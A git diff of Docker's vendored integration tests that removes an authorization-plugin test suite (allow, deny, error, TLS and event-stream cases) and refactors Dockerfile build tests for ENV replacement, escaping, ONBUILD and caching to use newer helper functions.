-		c.Assert(err, check.IsNil)
-
-		assertBody(c, authReq.RequestURI, authReq.ResponseHeaders, authReq.ResponseBody)
-		assertAuthHeaders(c, authReq.ResponseHeaders)
-
-		// Count only container list api
-		if strings.HasSuffix(authReq.RequestURI, containerListAPI) {
-			s.ctrl.psResponseCnt++
-		}
-		resRes := s.ctrl.resRes
-		if isAllowed(authReq.RequestURI) {
-			resRes = authorization.Response{Allow: true}
-		}
-		if resRes.Err != "" {
-			w.WriteHeader(http.StatusInternalServerError)
-		}
-		b, err := json.Marshal(resRes)
-		c.Assert(err, check.IsNil)
-		s.ctrl.resUser = authReq.User
-		w.Write(b)
-	})
-
-	err := os.MkdirAll("/etc/docker/plugins", 0755)
-	c.Assert(err, checker.IsNil)
-
-	fileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", testAuthZPlugin)
-	err = ioutil.WriteFile(fileName, []byte(s.server.URL), 0644)
-	c.Assert(err, checker.IsNil)
-}
-
-// check for always allowed endpoints to not inhibit test framework functions
-func isAllowed(reqURI string) bool {
-	for _, endpoint := range alwaysAllowed {
-		if strings.HasSuffix(reqURI, endpoint) {
-			return true
-		}
-	}
-	return false
-}
-
-// assertAuthHeaders validates authentication headers are removed
-func assertAuthHeaders(c *check.C, headers map[string]string) error {
-	for k := range headers {
-		if strings.Contains(strings.ToLower(k), "auth") || strings.Contains(strings.ToLower(k), "x-registry") {
-			c.Errorf("Found authentication headers in request '%v'", headers)
-		}
-	}
-	return nil
-}
-
-// assertBody asserts that body is removed for non text/json requests
-func assertBody(c *check.C, requestURI string, headers map[string]string, body []byte) {
-	if strings.Contains(strings.ToLower(requestURI), "auth") && len(body) > 0 {
-		//return fmt.Errorf("Body included for authentication endpoint %s", string(body))
-		c.Errorf("Body included for authentication endpoint %s", string(body))
-	}
-
-	for k, v := range headers {
-		if strings.EqualFold(k, "Content-Type") && strings.HasPrefix(v, "text/") || v == "application/json" {
-			return
-		}
-	}
-	if len(body) > 0 {
-		c.Errorf("Body included while it should not (Headers: '%v')", headers)
-	}
-}
-
-func (s *DockerAuthzSuite) TearDownSuite(c *check.C) {
-	if s.server == nil {
-		return
-	}
-
-	s.server.Close()
-
-	err := os.RemoveAll("/etc/docker/plugins")
-	c.Assert(err, checker.IsNil)
-}
-
-func (s *DockerAuthzSuite) TestAuthZPluginAllowRequest(c *check.C) {
-	// start the daemon and load busybox, --net=none build fails otherwise
-	// cause it needs to pull busybox
-	c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin), check.IsNil)
-	s.ctrl.reqRes.Allow = true
-	s.ctrl.resRes.Allow = true
-	c.Assert(s.d.LoadBusybox(), check.IsNil)
-
-	// Ensure command successful
-	out, err := s.d.Cmd("run", "-d", "busybox", "top")
-	c.Assert(err, check.IsNil)
-
-	id := strings.TrimSpace(out)
-	assertURIRecorded(c, s.ctrl.requestsURIs, "/containers/create")
-	assertURIRecorded(c, s.ctrl.requestsURIs, fmt.Sprintf("/containers/%s/start", id))
-
-	out, err = s.d.Cmd("ps")
-	c.Assert(err, check.IsNil)
-	c.Assert(assertContainerList(out, []string{id}), check.Equals, true)
-	c.Assert(s.ctrl.psRequestCnt, check.Equals, 1)
-	c.Assert(s.ctrl.psResponseCnt, check.Equals, 1)
-}
-
-func (s *DockerAuthzSuite) TestAuthZPluginTls(c *check.C) {
-
-	const testDaemonHTTPSAddr = "tcp://localhost:4271"
-	// start the daemon and load busybox, --net=none build fails otherwise
-	// cause it needs to pull busybox
-	if err := s.d.Start(
-		"--authorization-plugin="+testAuthZPlugin,
-		"--tlsverify",
-		"--tlscacert",
-		"fixtures/https/ca.pem",
-		"--tlscert",
-		"fixtures/https/server-cert.pem",
-		"--tlskey",
-		"fixtures/https/server-key.pem",
-		"-H", testDaemonHTTPSAddr); err != nil {
-		c.Fatalf("Could not start daemon with busybox: %v", err)
-	}
-
-	s.ctrl.reqRes.Allow = true
-	s.ctrl.resRes.Allow = true
-
-	out, _ := dockerCmd(
-		c,
-		"--tlsverify",
-		"--tlscacert", "fixtures/https/ca.pem",
-		"--tlscert", "fixtures/https/client-cert.pem",
-		"--tlskey", "fixtures/https/client-key.pem",
-		"-H",
-		testDaemonHTTPSAddr,
-		"version",
-	)
-	if !strings.Contains(out, "Server") {
-		c.Fatalf("docker version should return information of server side")
-	}
-
-	c.Assert(s.ctrl.reqUser, check.Equals, "client")
-	c.Assert(s.ctrl.resUser, check.Equals, "client")
-}
-
-func (s *DockerAuthzSuite) TestAuthZPluginDenyRequest(c *check.C) {
-	err := s.d.Start("--authorization-plugin=" + testAuthZPlugin)
-	c.Assert(err, check.IsNil)
-	s.ctrl.reqRes.Allow = false
-	s.ctrl.reqRes.Msg = unauthorizedMessage
-
-	// Ensure command is blocked
-	res, err := s.d.Cmd("ps")
-	c.Assert(err, check.NotNil)
-	c.Assert(s.ctrl.psRequestCnt, check.Equals, 1)
-	c.Assert(s.ctrl.psResponseCnt, check.Equals, 0)
-
-	// Ensure unauthorized message appears in response
-	c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: authorization denied by plugin %s: %s\n", testAuthZPlugin, unauthorizedMessage))
-}
-
-// TestAuthZPluginAPIDenyResponse validates that when authorization plugin deny the request, the status code is forbidden
-func (s *DockerAuthzSuite) TestAuthZPluginAPIDenyResponse(c *check.C) {
-	err := s.d.Start("--authorization-plugin=" + testAuthZPlugin)
-	c.Assert(err, check.IsNil)
-	s.ctrl.reqRes.Allow = false
-	s.ctrl.resRes.Msg = unauthorizedMessage
-
-	daemonURL, err := url.Parse(s.d.sock())
-
-	conn, err := net.DialTimeout(daemonURL.Scheme, daemonURL.Path, time.Second*10)
-	c.Assert(err, check.IsNil)
-	client := httputil.NewClientConn(conn, nil)
-	req, err := http.NewRequest("GET", "/version", nil)
-	c.Assert(err, check.IsNil)
-	resp, err := client.Do(req)
-
-	c.Assert(err, check.IsNil)
-	c.Assert(resp.StatusCode, checker.Equals, http.StatusForbidden)
-	c.Assert(err, checker.IsNil)
-}
-
-func (s *DockerAuthzSuite) TestAuthZPluginDenyResponse(c *check.C) {
-	err := s.d.Start("--authorization-plugin=" + testAuthZPlugin)
-	c.Assert(err, check.IsNil)
-	s.ctrl.reqRes.Allow = true
-	s.ctrl.resRes.Allow = false
-	s.ctrl.resRes.Msg = unauthorizedMessage
-
-	// Ensure command is blocked
-	res, err := s.d.Cmd("ps")
-	c.Assert(err, check.NotNil)
-	c.Assert(s.ctrl.psRequestCnt, check.Equals, 1)
-	c.Assert(s.ctrl.psResponseCnt, check.Equals, 1)
-
-	// Ensure unauthorized message appears in response
-	c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: authorization denied by plugin %s: %s\n", testAuthZPlugin, unauthorizedMessage))
-}
-
-// TestAuthZPluginAllowEventStream verifies event stream propagates correctly after request pass through by the authorization plugin
-func (s *DockerAuthzSuite) TestAuthZPluginAllowEventStream(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-
-	// start the daemon and load busybox to avoid pulling busybox from Docker Hub
-	c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin), check.IsNil)
-	s.ctrl.reqRes.Allow = true
-	s.ctrl.resRes.Allow = true
-	c.Assert(s.d.LoadBusybox(), check.IsNil)
-
-	startTime := strconv.FormatInt(daemonTime(c).Unix(), 10)
-	// Add another command to to enable event pipelining
-	eventsCmd := exec.Command(dockerBinary, "--host", s.d.sock(), "events", "--since", startTime)
-	stdout, err := eventsCmd.StdoutPipe()
-	if err != nil {
-		c.Assert(err, check.IsNil)
-	}
-
-	observer := eventObserver{
-		buffer:    new(bytes.Buffer),
-		command:   eventsCmd,
-		scanner:   bufio.NewScanner(stdout),
-		startTime: startTime,
-	}
-
-	err = observer.Start()
-	c.Assert(err, checker.IsNil)
-	defer observer.Stop()
-
-	// Create a container and wait for the creation events
-	out, err := s.d.Cmd("run", "-d", "busybox", "top")
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	containerID := strings.TrimSpace(out)
-	c.Assert(s.d.waitRun(containerID), checker.IsNil)
-
-	events := map[string]chan bool{
-		"create": make(chan bool, 1),
-		"start":  make(chan bool, 1),
-	}
-
-	matcher := matchEventLine(containerID, "container", events)
-	processor := processEventMatch(events)
-	go observer.Match(matcher, processor)
-
-	// Ensure all events are received
-	for event, eventChannel := range events {
-
-		select {
-		case <-time.After(30 * time.Second):
-			// Fail the test
-			observer.CheckEventError(c, containerID, event, matcher)
-			c.FailNow()
-		case <-eventChannel:
-			// Ignore, event received
-		}
-	}
-
-	// Ensure both events and container endpoints are passed to the authorization plugin
-	assertURIRecorded(c, s.ctrl.requestsURIs, "/events")
-	assertURIRecorded(c, s.ctrl.requestsURIs, "/containers/create")
-	assertURIRecorded(c, s.ctrl.requestsURIs, fmt.Sprintf("/containers/%s/start", containerID))
-}
-
-func (s *DockerAuthzSuite) TestAuthZPluginErrorResponse(c *check.C) {
-	err := s.d.Start("--authorization-plugin=" + testAuthZPlugin)
-	c.Assert(err, check.IsNil)
-	s.ctrl.reqRes.Allow = true
-	s.ctrl.resRes.Err = errorMessage
-
-	// Ensure command is blocked
-	res, err := s.d.Cmd("ps")
-	c.Assert(err, check.NotNil)
-
-	c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: plugin %s failed with error: %s: %s\n", testAuthZPlugin, authorization.AuthZApiResponse, errorMessage))
-}
-
-func (s *DockerAuthzSuite) TestAuthZPluginErrorRequest(c *check.C) {
-	err := s.d.Start("--authorization-plugin=" + testAuthZPlugin)
-	c.Assert(err, check.IsNil)
-	s.ctrl.reqRes.Err = errorMessage
-
-	// Ensure command is blocked
-	res, err := s.d.Cmd("ps")
-	c.Assert(err, check.NotNil)
-
-	c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: plugin %s failed with error: %s: %s\n", testAuthZPlugin, authorization.AuthZApiRequest, errorMessage))
-}
-
-func (s *DockerAuthzSuite) TestAuthZPluginEnsureNoDuplicatePluginRegistration(c *check.C) {
-	c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin), check.IsNil)
-
-	s.ctrl.reqRes.Allow = true
-	s.ctrl.resRes.Allow = true
-
-	out, err := s.d.Cmd("ps")
-	c.Assert(err, check.IsNil, check.Commentf(out))
-
-	// assert plugin is only called once..
-	c.Assert(s.ctrl.psRequestCnt, check.Equals, 1)
-	c.Assert(s.ctrl.psResponseCnt, check.Equals, 1)
-}
-
-func (s *DockerAuthzSuite) TestAuthZPluginEnsureLoadImportWorking(c *check.C) {
-	c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin), check.IsNil)
-	s.ctrl.reqRes.Allow = true
-	s.ctrl.resRes.Allow = true
-	c.Assert(s.d.LoadBusybox(), check.IsNil)
-
-	tmp, err := ioutil.TempDir("", "test-authz-load-import")
-	c.Assert(err, check.IsNil)
-	defer os.RemoveAll(tmp)
-
-	savedImagePath := filepath.Join(tmp, "save.tar")
-
-	out, err := s.d.Cmd("save", "-o", savedImagePath, "busybox")
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	out, err = s.d.Cmd("load", "--input", savedImagePath)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-
-	exportedImagePath := filepath.Join(tmp, "export.tar")
-
-	out, err = s.d.Cmd("run", "-d", "--name", "testexport", "busybox")
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	out, err = s.d.Cmd("export", "-o", exportedImagePath, "testexport")
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	out, err = s.d.Cmd("import", exportedImagePath)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-}
-
-func (s *DockerAuthzSuite) TestAuthZPluginHeader(c *check.C) {
-	c.Assert(s.d.Start("--debug", "--authorization-plugin="+testAuthZPlugin), check.IsNil)
-	s.ctrl.reqRes.Allow = true
-	s.ctrl.resRes.Allow = true
-	c.Assert(s.d.LoadBusybox(), check.IsNil)
-
-	daemonURL, err := url.Parse(s.d.sock())
-
-	conn, err := net.DialTimeout(daemonURL.Scheme, daemonURL.Path, time.Second*10)
-	c.Assert(err, check.IsNil)
-	client := httputil.NewClientConn(conn, nil)
-	req, err := http.NewRequest("GET", "/version", nil)
-	c.Assert(err, check.IsNil)
-	resp, err := client.Do(req)
-
-	c.Assert(err, check.IsNil)
-	c.Assert(resp.Header["Content-Type"][0], checker.Equals, "application/json")
-}
-
-// assertURIRecorded verifies that the given URI was sent and recorded in the authz plugin
-func assertURIRecorded(c *check.C, uris []string, uri string) {
-	var found bool
-	for _, u := range uris {
-		if strings.Contains(u, uri) {
-			found = true
-			break
-		}
-	}
-	if !found {
-		c.Fatalf("Expected to find URI '%s', recorded uris '%s'", uri, strings.Join(uris, ","))
-	}
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go
index 49c1062c25..1e88b1ba39 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go
@@ -7,7 +7,6 @@ import (
 	"fmt"
 	"io/ioutil"
 	"os"
-	"os/exec"
 	"path/filepath"
 	"reflect"
 	"regexp"
@@ -17,58 +16,44 @@ import (
 	"text/template"
 	"time"
 
-	"github.com/docker/docker/builder/dockerfile/command"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/cli/build"
+	"github.com/docker/docker/internal/test/fakecontext"
+	"github.com/docker/docker/internal/test/fakegit"
+	"github.com/docker/docker/internal/test/fakestorage"
+	"github.com/docker/docker/internal/testutil"
 	"github.com/docker/docker/pkg/archive"
-	"github.com/docker/docker/pkg/integration/checker"
-	icmd "github.com/docker/docker/pkg/integration/cmd"
-	"github.com/docker/docker/pkg/stringutils"
 	"github.com/go-check/check"
+	"github.com/moby/buildkit/frontend/dockerfile/command"
+	"github.com/opencontainers/go-digest"
+	"gotest.tools/icmd"
 )
 
 func (s *DockerSuite) TestBuildJSONEmptyRun(c *check.C) {
-	name := "testbuildjsonemptyrun"
-
-	_, err := buildImage(
-		name,
-		`
+	cli.BuildCmd(c, "testbuildjsonemptyrun", build.WithDockerfile(`
     FROM busybox
     RUN []
-    `,
-		true)
-
-	if err != nil {
-		c.Fatal("error when dealing with a RUN statement with empty JSON array")
-	}
-
+    `))
 }
 
 func (s *DockerSuite) TestBuildShCmdJSONEntrypoint(c *check.C) {
 	name := "testbuildshcmdjsonentrypoint"
+	expected := "/bin/sh -c echo test"
+	if testEnv.OSType == "windows" {
+		expected = "cmd /S /C echo test"
+	}
 
-	_, err := buildImage(
-		name,
-		`
+	buildImageSuccessfully(c, name, build.WithDockerfile(`
     FROM busybox
     ENTRYPOINT ["echo"]
     CMD echo test
-    `,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-
+    `))
 	out, _ := dockerCmd(c, "run", "--rm", name)
 
-	if daemonPlatform == "windows" {
-		if !strings.Contains(out, "cmd /S /C echo test") {
-			c.Fatalf("CMD did not contain cmd /S /C echo test : %q", out)
-		}
-	} else {
-		if strings.TrimSpace(out) != "/bin/sh -c echo test" {
-			c.Fatalf("CMD did not contain /bin/sh -c : %q", out)
-		}
+	if strings.TrimSpace(out) != expected {
+		c.Fatalf("CMD did not contain %q : %q", expected, out)
 	}
-
 }
 
 func (s *DockerSuite) TestBuildEnvironmentReplacementUser(c *check.C) {
@@ -76,21 +61,16 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementUser(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	name := "testbuildenvironmentreplacement"
 
-	_, err := buildImage(name, `
+	buildImageSuccessfully(c, name, build.WithDockerfile(`
   FROM scratch
   ENV user foo
   USER ${user}
-  `, true)
-	if err != nil {
-		c.Fatal(err)
-	}
-
+  `))
 	res := inspectFieldJSON(c, name, "Config.User")
 
 	if res != `"foo"` {
 		c.Fatal("User foo from environment not in Config.User on image")
 	}
-
 }
 
 func (s *DockerSuite) TestBuildEnvironmentReplacementVolume(c *check.C) {
@@ -98,29 +78,20 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementVolume(c *check.C) {
 
 	var volumePath string
 
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		volumePath = "c:/quux"
 	} else {
 		volumePath = "/quux"
 	}
 
-	_, err := buildImage(name, `
+	buildImageSuccessfully(c, name, build.WithDockerfile(`
   FROM `+minimalBaseImage()+`
   ENV volume `+volumePath+`
   VOLUME ${volume}
-  `, true)
-	if err != nil {
-		c.Fatal(err)
-	}
-
-	res := inspectFieldJSON(c, name, "Config.Volumes")
+  `))
 
 	var volumes map[string]interface{}
-
-	if err := json.Unmarshal([]byte(res), &volumes); err != nil {
-		c.Fatal(err)
-	}
-
+	inspectFieldAndUnmarshall(c, name, "Config.Volumes", &volumes)
 	if _, ok := volumes[volumePath]; !ok {
 		c.Fatal("Volume " + volumePath + " from environment not in Config.Volumes on image")
 	}
@@ -132,27 +103,17 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementExpose(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	name := "testbuildenvironmentreplacement"
 
-	_, err := buildImage(name, `
+	buildImageSuccessfully(c, name, build.WithDockerfile(`
   FROM scratch
   ENV port 80
   EXPOSE ${port}
   ENV ports "  99   100 "
   EXPOSE ${ports}
-  `, true)
-	if err != nil {
-		c.Fatal(err)
-	}
-
-	res := inspectFieldJSON(c, name, "Config.ExposedPorts")
+  `))
 
 	var exposedPorts map[string]interface{}
-
-	if err := json.Unmarshal([]byte(res), &exposedPorts); err != nil {
-		c.Fatal(err)
-	}
-
+	inspectFieldAndUnmarshall(c, name, "Config.ExposedPorts", &exposedPorts)
 	exp := []int{80, 99, 100}
-
 	for _, p := range exp {
 		tmp := fmt.Sprintf("%d/tcp", p)
 		if _, ok := exposedPorts[tmp]; !ok {
@@ -165,23 +126,28 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementExpose(c *check.C) {
 func (s *DockerSuite) TestBuildEnvironmentReplacementWorkdir(c *check.C) {
 	name := "testbuildenvironmentreplacement"
 
-	_, err := buildImage(name, `
+	buildImageSuccessfully(c, name, build.WithDockerfile(`
   FROM busybox
   ENV MYWORKDIR /work
   RUN mkdir ${MYWORKDIR}
   WORKDIR ${MYWORKDIR}
-  `, true)
+  `))
+	res := inspectFieldJSON(c, name, "Config.WorkingDir")
 
-	if err != nil {
-		c.Fatal(err)
+	expected := `"/work"`
+	if testEnv.OSType == "windows" {
+		expected = `"C:\\work"`
+	}
+	if res != expected {
+		c.Fatalf("Workdir /workdir from environment not in Config.WorkingDir on image: %s", res)
 	}
-
 }
 
 func (s *DockerSuite) TestBuildEnvironmentReplacementAddCopy(c *check.C) {
 	name := "testbuildenvironmentreplacement"
 
-	ctx, err := fakeContext(`
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `
   FROM `+minimalBaseImage()+`
   ENV baz foo
   ENV quux bar
@@ -193,23 +159,12 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementAddCopy(c *check.C) {
   COPY ${quux} ${dot}
   ADD ${zzz:-${fee}} ${dot}
   COPY ${zzz:-${gee}} ${dot}
-  `,
-		map[string]string{
-			"foo": "test1",
-			"bar": "test2",
-			"fff": "test3",
-			"ggg": "test4",
-		})
-
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
-
+  `),
+		build.WithFile("foo", "test1"),
+		build.WithFile("bar", "test2"),
+		build.WithFile("fff", "test3"),
+		build.WithFile("ggg", "test4"),
+	))
 }
 
 func (s *DockerSuite) TestBuildEnvironmentReplacementEnv(c *check.C) {
@@ -217,8 +172,7 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementEnv(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	name := "testbuildenvironmentreplacement"
 
-	_, err := buildImage(name,
-		`
+	buildImageSuccessfully(c, name, build.WithDockerfile(`
   FROM busybox
   ENV foo zzz
   ENV bar ${foo}
@@ -231,20 +185,18 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementEnv(c *check.C) {
   RUN [ "$abc3" = '$foo' ] && (echo "$abc3" | grep -q foo)
   ENV abc4 "\$foo"
   RUN [ "$abc4" = '$foo' ] && (echo "$abc4" | grep -q foo)
-  `, true)
-
-	if err != nil {
-		c.Fatal(err)
-	}
-
-	res := inspectFieldJSON(c, name, "Config.Env")
-
-	envResult := []string{}
-
-	if err = json.Unmarshal([]byte(res), &envResult); err != nil {
-		c.Fatal(err)
-	}
-
+  ENV foo2="abc\def"
+  RUN [ "$foo2" = 'abc\def' ]
+  ENV foo3="abc\\def"
+  RUN [ "$foo3" = 'abc\def' ]
+  ENV foo4='abc\\def'
+  RUN [ "$foo4" = 'abc\\def' ]
+  ENV foo5='abc\def'
+  RUN [ "$foo5" = 'abc\def' ]
+  `))
+
+	var envResult []string
+	inspectFieldAndUnmarshall(c, name, "Config.Env", &envResult)
 	found := false
 	envCount := 0
 
@@ -258,7 +210,7 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementEnv(c *check.C) {
 		} else if strings.HasPrefix(parts[0], "env") {
 			envCount++
 			if parts[1] != "zzz" {
-				c.Fatalf("%s should be 'foo' but instead its %q", parts[0], parts[1])
+				c.Fatalf("%s should be 'zzz' but instead its %q", parts[0], parts[1])
 			}
 		} else if strings.HasPrefix(parts[0], "env") {
 			envCount++
@@ -278,114 +230,70 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementEnv(c *check.C) {
 
 }
 
-func (s *DockerSuite) TestBuildHandleEscapes(c *check.C) {
+func (s *DockerSuite) TestBuildHandleEscapesInVolume(c *check.C) {
 	// The volume paths used in this test are invalid on Windows
 	testRequires(c, DaemonIsLinux)
 	name := "testbuildhandleescapes"
 
-	_, err := buildImage(name,
-		`
-  FROM scratch
-  ENV FOO bar
-  VOLUME ${FOO}
-  `, true)
-
-	if err != nil {
-		c.Fatal(err)
-	}
-
-	var result map[string]map[string]struct{}
-
-	res := inspectFieldJSON(c, name, "Config.Volumes")
-
-	if err = json.Unmarshal([]byte(res), &result); err != nil {
-		c.Fatal(err)
-	}
-
-	if _, ok := result["bar"]; !ok {
-		c.Fatalf("Could not find volume bar set from env foo in volumes table, got %q", result)
-	}
-
-	deleteImages(name)
-
-	_, err = buildImage(name,
-		`
-  FROM scratch
-  ENV FOO bar
-  VOLUME \${FOO}
-  `, true)
-
-	if err != nil {
-		c.Fatal(err)
-	}
-
-	res = inspectFieldJSON(c, name, "Config.Volumes")
-
-	if err = json.Unmarshal([]byte(res), &result); err != nil {
-		c.Fatal(err)
-	}
-
-	if _, ok := result["${FOO}"]; !ok {
-		c.Fatalf("Could not find volume ${FOO} set from env foo in volumes table, got %q", result)
+	testCases := []struct {
+		volumeValue string
+		expected    string
+	}{
+		{
+			volumeValue: "${FOO}",
+			expected:    "bar",
+		},
+		{
+			volumeValue: `\${FOO}`,
+			expected:    "${FOO}",
+		},
+		// this test in particular provides *7* backslashes and expects 6 to come back.
+		// Like above, the first escape is swallowed and the rest are treated as
+		// literals, this one is just less obvious because of all the character noise.
+		{
+			volumeValue: `\\\\\\\${FOO}`,
+			expected:    `\\\${FOO}`,
+		},
 	}
 
-	deleteImages(name)
-
-	// this test in particular provides *7* backslashes and expects 6 to come back.
-	// Like above, the first escape is swallowed and the rest are treated as
-	// literals, this one is just less obvious because of all the character noise.
-
-	_, err = buildImage(name,
-		`
+	for _, tc := range testCases {
+		buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(`
   FROM scratch
   ENV FOO bar
-  VOLUME \\\\\\\${FOO}
-  `, true)
-
-	if err != nil {
-		c.Fatal(err)
-	}
-
-	res = inspectFieldJSON(c, name, "Config.Volumes")
+  VOLUME %s
+  `, tc.volumeValue)))
 
-	if err = json.Unmarshal([]byte(res), &result); err != nil {
-		c.Fatal(err)
-	}
+		var result map[string]map[string]struct{}
+		inspectFieldAndUnmarshall(c, name, "Config.Volumes", &result)
+		if _, ok := result[tc.expected]; !ok {
+			c.Fatalf("Could not find volume %s set from env foo in volumes table, got %q", tc.expected, result)
+		}
 
-	if _, ok := result[`\\\${FOO}`]; !ok {
-		c.Fatalf(`Could not find volume \\\${FOO} set from env foo in volumes table, got %q`, result)
+		// Remove the image for the next iteration
+		dockerCmd(c, "rmi", name)
 	}
-
 }
 
 func (s *DockerSuite) TestBuildOnBuildLowercase(c *check.C) {
 	name := "testbuildonbuildlowercase"
 	name2 := "testbuildonbuildlowercase2"
 
-	_, err := buildImage(name,
-		`
+	buildImageSuccessfully(c, name, build.WithDockerfile(`
   FROM busybox
   onbuild run echo quux
-  `, true)
-
-	if err != nil {
-		c.Fatal(err)
-	}
+  `))
 
-	_, out, err := buildImageWithOut(name2, fmt.Sprintf(`
+	result := buildImage(name2, build.WithDockerfile(fmt.Sprintf(`
   FROM %s
-  `, name), true)
-
-	if err != nil {
-		c.Fatal(err)
-	}
+  `, name)))
+	result.Assert(c, icmd.Success)
 
-	if !strings.Contains(out, "quux") {
-		c.Fatalf("Did not receive the expected echo text, got %s", out)
+	if !strings.Contains(result.Combined(), "quux") {
+		c.Fatalf("Did not receive the expected echo text, got %s", result.Combined())
 	}
 
-	if strings.Contains(out, "ONBUILD ONBUILD") {
-		c.Fatalf("Got an ONBUILD ONBUILD error with no error: got %s", out)
+	if strings.Contains(result.Combined(), "ONBUILD ONBUILD") {
+		c.Fatalf("Got an ONBUILD ONBUILD error with no error: got %s", result.Combined())
 	}
 
 }
@@ -394,20 +302,13 @@ func (s *DockerSuite) TestBuildEnvEscapes(c *check.C) {
 	// ENV expansions work differently in Windows
 	testRequires(c, DaemonIsLinux)
 	name := "testbuildenvescapes"
-	_, err := buildImage(name,
-		`
+	buildImageSuccessfully(c, name, build.WithDockerfile(`
     FROM busybox
     ENV TEST foo
     CMD echo \$
-    `,
-		true)
-
-	if err != nil {
-		c.Fatal(err)
-	}
+    `))
 
 	out, _ := dockerCmd(c, "run", "-t", name)
-
 	if strings.TrimSpace(out) != "$" {
 		c.Fatalf("Env TEST was not overwritten with bar when foo was supplied to dockerfile: was %q", strings.TrimSpace(out))
 	}
@@ -418,77 +319,48 @@ func (s *DockerSuite) TestBuildEnvOverwrite(c *check.C) {
 	// ENV expansions work differently in Windows
 	testRequires(c, DaemonIsLinux)
 	name := "testbuildenvoverwrite"
-
-	_, err := buildImage(name,
-		`
+	buildImageSuccessfully(c, name, build.WithDockerfile(`
     FROM busybox
     ENV TEST foo
     CMD echo ${TEST}
-    `,
-		true)
-
-	if err != nil {
-		c.Fatal(err)
-	}
+    `))
 
 	out, _ := dockerCmd(c, "run", "-e", "TEST=bar", "-t", name)
-
 	if strings.TrimSpace(out) != "bar" {
 		c.Fatalf("Env TEST was not overwritten with bar when foo was supplied to dockerfile: was %q", strings.TrimSpace(out))
 	}
 
 }
 
+// FIXME(vdemeester) why we disabled cache here ?
 func (s *DockerSuite) TestBuildOnBuildCmdEntrypointJSON(c *check.C) {
 	name1 := "onbuildcmd"
 	name2 := "onbuildgenerated"
 
-	_, err := buildImage(name1, `
+	cli.BuildCmd(c, name1, build.WithDockerfile(`
 FROM busybox
 ONBUILD CMD ["hello world"]
 ONBUILD ENTRYPOINT ["echo"]
-ONBUILD RUN ["true"]`,
-		false)
-
-	if err != nil {
-		c.Fatal(err)
-	}
-
-	_, err = buildImage(name2, fmt.Sprintf(`FROM %s`, name1), false)
-
-	if err != nil {
-		c.Fatal(err)
-	}
-
-	out, _ := dockerCmd(c, "run", name2)
+ONBUILD RUN ["true"]`))
 
-	if !regexp.MustCompile(`(?m)^hello world`).MatchString(out) {
-		c.Fatalf("did not get echo output from onbuild. Got: %q", out)
-	}
+	cli.BuildCmd(c, name2, build.WithDockerfile(fmt.Sprintf(`FROM %s`, name1)))
 
+	result := cli.DockerCmd(c, "run", name2)
+	result.Assert(c, icmd.Expected{Out: "hello world"})
 }
 
+// FIXME(vdemeester) why we disabled cache here ?
 func (s *DockerSuite) TestBuildOnBuildEntrypointJSON(c *check.C) {
 	name1 := "onbuildcmd"
 	name2 := "onbuildgenerated"
 
-	_, err := buildImage(name1, `
+	buildImageSuccessfully(c, name1, build.WithDockerfile(`
 FROM busybox
-ONBUILD ENTRYPOINT ["echo"]`,
-		false)
-
-	if err != nil {
-		c.Fatal(err)
-	}
-
-	_, err = buildImage(name2, fmt.Sprintf("FROM %s\nCMD [\"hello world\"]\n", name1), false)
+ONBUILD ENTRYPOINT ["echo"]`))
 
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name2, build.WithDockerfile(fmt.Sprintf("FROM %s\nCMD [\"hello world\"]\n", name1)))
 
 	out, _ := dockerCmd(c, "run", name2)
-
 	if !regexp.MustCompile(`(?m)^hello world`).MatchString(out) {
 		c.Fatal("got malformed output from onbuild", out)
 	}
@@ -498,70 +370,51 @@ ONBUILD ENTRYPOINT ["echo"]`,
 func (s *DockerSuite) TestBuildCacheAdd(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Windows doesn't have httpserver image yet
 	name := "testbuildtwoimageswithadd"
-	server, err := fakeStorage(map[string]string{
+	server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{
 		"robots.txt": "hello",
 		"index.html": "world",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
+	}))
 	defer server.Close()
 
-	if _, err := buildImage(name,
-		fmt.Sprintf(`FROM scratch
-		ADD %s/robots.txt /`, server.URL()),
-		true); err != nil {
-		c.Fatal(err)
-	}
